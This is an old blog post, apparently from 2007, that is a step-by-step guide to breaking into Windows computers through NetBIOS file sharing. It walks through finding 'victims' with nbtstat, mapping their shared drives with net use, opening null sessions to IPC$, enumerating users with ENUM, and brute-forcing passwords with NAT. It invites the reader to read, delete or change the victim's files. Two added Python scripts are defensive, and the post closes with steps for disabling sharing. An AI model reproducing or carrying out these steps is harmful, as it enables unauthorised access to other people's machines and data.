
Saturday, July 14, 2007

hack using netbios

Introduction.

NetBIOS stands for Network Basic Input Output System and is probably the easiest way to hack a system remotely. It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Like any other service, it works on a port (in this case port 139).

NOTE: You can use any port scanner to find a system running NetBIOS by scanning for port 139. A specific scanner for NetBIOS is "XSharez", which you can find in our "scanners" download section.

Nbtstat command.

We can manually interact with NetBIOS by using the command prompt and the nbtstat command. Just go to Start -> Run and type in "command" or "cmd". Your MS-DOS window will open. Now type in nbtstat /? and you will get something like:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>nbtstat/?

Displays protocol statistics and current TCP/IP connections using NBT
(NetBIOS over TCP/IP).

NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh

RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.

NOTE: The main command that we are going to use is c:\>nbtstat -a ip, e.g. c:\>nbtstat -a 100.100.100.100

After we use the above command, we will get something like:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = 00-02-48-18-29-E7

NOTE: The important thing here (which actually tells us that file and printer sharing is enabled on the victim's system) is the <20>.

NOTE: If we don't get a <20>, then file and printer sharing is not enabled on the victim's system and we must search for another victim.
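As an added example (not code from the original post), here is a small Python parser for the nbtstat name table shown above: it maps the well-known name suffixes to the services they advertise and flags the <20> entry, so an administrator can turn saved nbtstat output for a whole subnet into an inventory of hosts that still expose file and printer sharing. The sample table inside the script is constructed.

```python
"""Added example (not from the original post): parse the name table that
nbtstat -a / nbtstat -A prints, label each NetBIOS suffix with the service
it advertises and flag hosts exposing the <20> File Server service."""
import re

# Well-known NetBIOS name suffixes and the service each one advertises.
SUFFIXES = {
    ("00", "UNIQUE"): "Workstation service",
    ("00", "GROUP"): "Domain/workgroup name",
    ("03", "UNIQUE"): "Messenger service",
    ("20", "UNIQUE"): "File Server service (file and printer sharing)",
    ("1B", "UNIQUE"): "Domain master browser",
    ("1C", "GROUP"): "Domain controllers",
}

# One table row: name  <suffix>  UNIQUE|GROUP  status
ROW = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)", re.M)
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

def parse_name_table(text):
    """Return the parsed rows, the MAC and whether file sharing is advertised."""
    rows = []
    for name, suffix, kind, status in ROW.findall(text):
        suffix = suffix.upper()
        rows.append({"name": name, "suffix": suffix, "type": kind, "status": status,
                     "service": SUFFIXES.get((suffix, kind), "Unknown suffix")})
    mac = MAC.search(text)
    return {
        "names": rows,
        "mac": mac.group(1).upper() if mac else None,
        # The <20> UNIQUE entry is the indicator the post relies on.
        "file_sharing": any(r["suffix"] == "20" and r["type"] == "UNIQUE" for r in rows),
    }

# Constructed sample in the layout nbtstat prints (not a real host).
SAMPLE = """\
       Name               Type         Status
    ---------------------------------------------
    user           <00>  UNIQUE      Registered
    workgroup      <00>  GROUP       Registered
    user           <03>  UNIQUE      Registered
    user           <20>  UNIQUE      Registered

    MAC Address = 00-02-48-18-29-E7
"""

if __name__ == "__main__":
    result = parse_name_table(SAMPLE)
    for r in result["names"]:
        print(f"{r['name']:<12} <{r['suffix']}> {r['type']:<6} {r['service']}")
    print("file sharing advertised:", result["file_sharing"])
```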

Now we type in MS-DOS (which should still be open) c:\>net view \\ip, e.g. c:\>net view \\100.100.100.100

Share name Type Used as Comment

-------------------------------------------------------------------------
CDISK Disk
HP-6L Print

OK, now we can see that our victim is sharing a disk named CDISK and a printer named HP-6L.

NOTE: If we are able to connect to the victim's shared hard disks, folders or printers, we will be able to read and write to those folders or hard disks, or we may also be able to print anything on the remote printer.

Normal connection.

Just type in MS-DOS c:\>net use k: \\100.100.100.100\CDISK

NOTE: The letter k can be anything you like. It will appear in your "My Computer" and you will be able to control your victim's system (copy, paste, delete, read, write etc.)

If you get the confirmation "Command completed successfully", then just go to "My Computer", open the k:\ drive (which will be your victim's drive on your PC) and do anything you like.

Connection with Null Session.

For a null session, we must use c:\>net use \\100.100.100.100\IPC$ "" /u:"" .

NOTE: If we get "Command completed successfully", then we are connected anonymously. If we get an error such as "System error 51 has occurred" or "Host not found", then the victim has set RestrictAnonymous to prevent anonymous connections.
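Seen from the target's side, as an added example that is not part of the original post: a null session to IPC$ is recorded as a network logon by the built-in ANONYMOUS LOGON account, and this Python script flags such logons in exported Security log text and counts them per source address. The records it parses are constructed and only loosely follow the field names of the Windows logon event (4624), so adjust the field names to your export format.

```python
"""Added example (not part of the original post): detection logic for the
null-session connection described above, run over constructed log text.
A null session to IPC$ shows up on the target as a network logon (Logon
Type 3) by the ANONYMOUS LOGON account; the records below are constructed
and only loosely follow the field names of event 4624."""
import re

FIELD = re.compile(
    r"^\s*(Event ID|Logon Type|Account Name|Source Network Address):\s*(.*?)\s*$", re.M)

def parse_events(text):
    """Split exported log text on blank lines and pick out the fields we need."""
    events = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        fields = dict(FIELD.findall(chunk))
        if fields:
            events.append(fields)
    return events

def find_null_sessions(events):
    """Map source address -> number of anonymous network logons seen from it."""
    hits = {}
    for ev in events:
        if ev.get("Event ID") != "4624" or ev.get("Logon Type") != "3":
            continue
        if ev.get("Account Name", "").upper() != "ANONYMOUS LOGON":
            continue
        src = ev.get("Source Network Address", "-")
        hits[src] = hits.get(src, 0) + 1
    return hits

# Constructed sample: two anonymous logons from one host, one normal user logon.
SAMPLE_LOG = """\
Event ID: 4624
Logon Type: 3
Account Name: ANONYMOUS LOGON
Source Network Address: 192.0.2.10

Event ID: 4624
Logon Type: 3
Account Name: Cynos
Source Network Address: 192.0.2.20

Event ID: 4624
Logon Type: 3
Account Name: ANONYMOUS LOGON
Source Network Address: 192.0.2.10
"""

if __name__ == "__main__":
    for src, n in find_null_sessions(parse_events(SAMPLE_LOG)).items():
        print(f"{src}: {n} anonymous network logon(s) - possible null-session enumeration")
```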

Collection of information

  • CIS or ENUM
  • NAT (Netbios Auditing Tool)

NOTE: Those tools are in our "Scanners" download section. Go get them. We are going to use them to collect info from the victim.

ENUM (works from command prompt):

usage: enum [switches] [hostname|ip]
-U get userlist
-M get machine list
-N get namelist dump (different from -U|-M)
-S get sharelist
-P get password policy information
-G get group and member list
-L get LSA policy information
-D dictionary crack, needs -u and -f
-d be detailed, applies to -U and -S
-c don't cancel sessions
-u specify username to use (default "")
-p specify password to use (default "")
-f specify dictfile to use (wants -D)


If we type (in the ENUM command prompt) enum -U -S -G 100.100.100.100, ENUM will try to connect to the victim with a null session (it doesn't matter if we already did) and we will get some info about the victim. See the example below.

server: 100.100.100.100
setting up session... success.
getting user list (pass 1, index 0)... success, got 7.
Administrator Guest AM2o Cynos Sisqo printer
enumerating shares (pass 1)... got 6 shares, 0 left:
IPC$ print$ C ADMIN$ C$ CanonCLC320
Group: Administrators
AM2o\Administrator
Group: Backup Operators
Group: Guests
AM2o\Guest
Group: Power Users
AM2o\AM2o
AM2o\Cynos
AM2o\Sisqo
Group: *******
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
AM2o\printer
Group: Debugger Users
NT AUTHORITY\SYSTEM
cleaning up... success.

NOTE: We can see from here the system name: AM2o; users: Administrator, Guest, Cynos, Sisqo; shares: IPC$ print$ C ADMIN$ C$ CanonCLC320; power users: AM2o, Cynos, Sisqo. You can also use the other switches to collect more info if you like.

CIS (Cerberus Information Security):

Just set a host (without http://) or an IP (e.g. 100.100.100.100), then go to "File" -> Select module and choose "netbios checks". This will automatically collect the information. When it has completed, press "View report". The advantage of CIS is that when it finds a user, it automatically tries to find the password too (I'll explain about passwords later), if one exists.

NOTE: The symbol $ indicates hidden shares, e.g. ADMIN$ is %systemroot% (C:\winnt for Windows NT and 2000, C:\windows for XP, etc.). Those shares are protected with passwords, so try to avoid them (for now). E.g. if the shares are IPC$ print$ C ADMIN$ C$ CanonCLC320, then use net use \\100.100.100.100\C .

NAT (Netbios Auditing Tool):

This is a very good tool which will try to find the shares and get through the passwords. It uses a userlist and a passlist that we define, so collect as much info as you can with ENUM and/or CIS.

Usage: nat -o results.txt -u userlist.txt -p passlist.txt 100.100.100.100

NOTE: If a password is finally found, we use net use k: \\ip\share * /u:user, e.g. net use k: \\100.100.100.100\C * /u:Cynos, and when we are asked for the password, just type it and you are connected. You will get "Command completed successfully".

NOTE: Another good tool like NAT is PQwak2, which you can get here.

Disable File and Printer sharing.

  • Click the Start Menu and choose Settings, Control Panel.
  • Double-click the Network icon.
  • Click the Configuration tab.
  • Click the File and Print Sharing button. The File and Print Sharing dialog box will appear.
  • Make sure that the following two boxes are NOT checked:
    "I want to be able to give others access to my files"
    "I want to be able to allow others to print from my printers"
  • Click the OK button in the File and Print Sharing dialog box.
  • Click the OK button in the Network control panel.
    A prompt box will appear requesting you to restart your computer.
    (If no changes were made, this box may not appear.)
  • Restart your computer for your new setting to take effect.
